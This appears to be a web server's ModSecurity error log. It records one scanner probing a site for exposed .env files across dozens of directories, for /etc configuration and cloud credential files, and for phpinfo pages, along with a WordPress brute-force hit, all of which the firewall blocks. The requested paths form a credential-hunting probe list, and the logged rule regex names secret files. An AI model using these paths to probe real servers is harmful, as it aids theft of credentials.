[Tue May 26 14:29:55.697454 2026] [security2:error] [pid 606909:tid 606920] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/current/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzBAAA-Ao"]
[Tue May 26 14:29:55.704083 2026] [security2:error] [pid 606909:tid 607024] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/demo/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzBwAAn3I"]
[Tue May 26 14:29:55.724746 2026] [security2:error] [pid 606909:tid 607010] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/dev/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzCAAAm2Q"]
[Tue May 26 14:29:55.737925 2026] [security2:error] [pid 606909:tid 606980] [remote 163.223.13.54:42608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVhC10yRtX9qA7aVUVy9gAA6kY"]
[Tue May 26 14:29:55.744033 2026] [security2:error] [pid 606909:tid 607006] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/develop/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzCgAAsmA"]
[Tue May 26 14:29:55.747991 2026] [security2:error] [pid 606909:tid 606995] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/developer/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzCwAAr1U"]
[Tue May 26 14:29:55.748968 2026] [security2:error] [pid 606909:tid 607031] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/development/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzDAAAr3k"]
[Tue May 26 14:29:55.750986 2026] [cgid:error] [pid 606909:tid 606986] [remote 195.178.110.199:50950] AH01264: stderr from /home2/azurm42s/gestionbar.azurmediatec.com/dnscfg.cgi: script not found or unable to stat
[Tue May 26 14:29:55.902207 2026] [security2:error] [pid 606909:tid 607003] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/erp/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzHwAArV0"]
[Tue May 26 14:29:55.933431 2026] [security2:error] [pid 606909:tid 607017] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVhC10yRtX9qA7aVUVzIQAAv2s"]
[Tue May 26 14:29:55.934904 2026] [security2:error] [pid 606909:tid 606923] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/etc/boto.cfg"] [unique_id "ahVhC10yRtX9qA7aVUVzIgAAvw0"]
[Tue May 26 14:29:55.939141 2026] [security2:error] [pid 606909:tid 606919] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/fe/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzJAABAAk"]
[Tue May 26 14:29:56.016572 2026] [security2:error] [pid 606909:tid 606921] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/frontend/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzKgAApws"]
[Tue May 26 14:29:56.016639 2026] [security2:error] [pid 606909:tid 606989] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/front/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzKwAAp08"]
[Tue May 26 14:29:56.079937 2026] [security2:error] [pid 606909:tid 606916] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/info.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzMwAApAY"]
[Tue May 26 14:29:56.088401 2026] [security2:error] [pid 606909:tid 606928] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/infophp.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzNAAA2RI"]
[Tue May 26 14:29:56.088583 2026] [security2:error] [pid 606909:tid 606934] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/infos.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzNQAA2Rg"]
[Tue May 26 14:29:56.147493 2026] [security2:error] [pid 606909:tid 606931] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/laravel/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzOwAA5hU"]
[Tue May 26 14:29:56.159209 2026] [security2:error] [pid 606909:tid 607019] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/lms/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzPAAA720"]
[Tue May 26 14:29:56.172133 2026] [security2:error] [pid 606909:tid 607020] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/local/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzPgAAnW4"]
[Tue May 26 14:29:56.204521 2026] [security2:error] [pid 606909:tid 606933] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/marketing/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzQwAAjBc"]
[Tue May 26 14:29:56.205546 2026] [security2:error] [pid 606909:tid 607022] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/market/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzQgAAjHA"]
[Tue May 26 14:29:56.217083 2026] [security2:error] [pid 606909:tid 607028] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/media/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzRQAAqXY"]
[Tue May 26 14:29:56.290501 2026] [security2:error] [pid 606909:tid 606936] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node-api/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzSQAApho"]
[Tue May 26 14:29:56.292660 2026] [security2:error] [pid 606909:tid 606961] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/new/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzSgAAozM"]
[Tue May 26 14:29:56.295343 2026] [security2:error] [pid 606909:tid 607027] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzSwAA6HU"]
[Tue May 26 14:29:56.304975 2026] [security2:error] [pid 606909:tid 606942] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/api/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzTAAAhyA"]
[Tue May 26 14:29:56.318298 2026] [security2:error] [pid 606909:tid 606940] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/backend/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzTQAAmR4"]
[Tue May 26 14:29:56.318312 2026] [security2:error] [pid 606909:tid 606947] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/nodeapi/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzTgAAmSU"]
[Tue May 26 14:29:56.339978 2026] [security2:error] [pid 606909:tid 606938] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/nodeweb/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzTwAA0Rw"]
[Tue May 26 14:29:56.357676 2026] [security2:error] [pid 606909:tid 606962] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/old/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzUgAAhTQ"]
[Tue May 26 14:29:56.366491 2026] [security2:error] [pid 606909:tid 606983] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/opt/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzVQAA20k"]
[Tue May 26 14:29:56.543465 2026] [security2:error] [pid 606909:tid 606974] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php-info.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzbgAA30A"]
[Tue May 26 14:29:56.588464 2026] [security2:error] [pid 606909:tid 607035] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzbwAA830"]
[Tue May 26 14:29:56.588600 2026] [security2:error] [pid 606909:tid 606945] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php_info.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzcAAA8yM"]
[Tue May 26 14:29:56.609300 2026] [security2:error] [pid 606909:tid 606955] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/phpinfo.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzcgAAty0"]
[Tue May 26 14:29:56.618034 2026] [security2:error] [pid 606909:tid 606970] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/portal/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzdAAApTw"]
[Tue May 26 14:29:56.651402 2026] [security2:error] [pid 606909:tid 606944] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/prod/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzdwAAwCI"]
[Tue May 26 14:29:56.656568 2026] [security2:error] [pid 606909:tid 606954] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/product/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzeQAAzSw"]
[Tue May 26 14:29:56.661898 2026] [security2:error] [pid 606909:tid 606979] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/production/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzegABAUU"]
[Tue May 26 14:29:56.689496 2026] [security2:error] [pid 606909:tid 606971] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/project/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzfQAAnj0"]
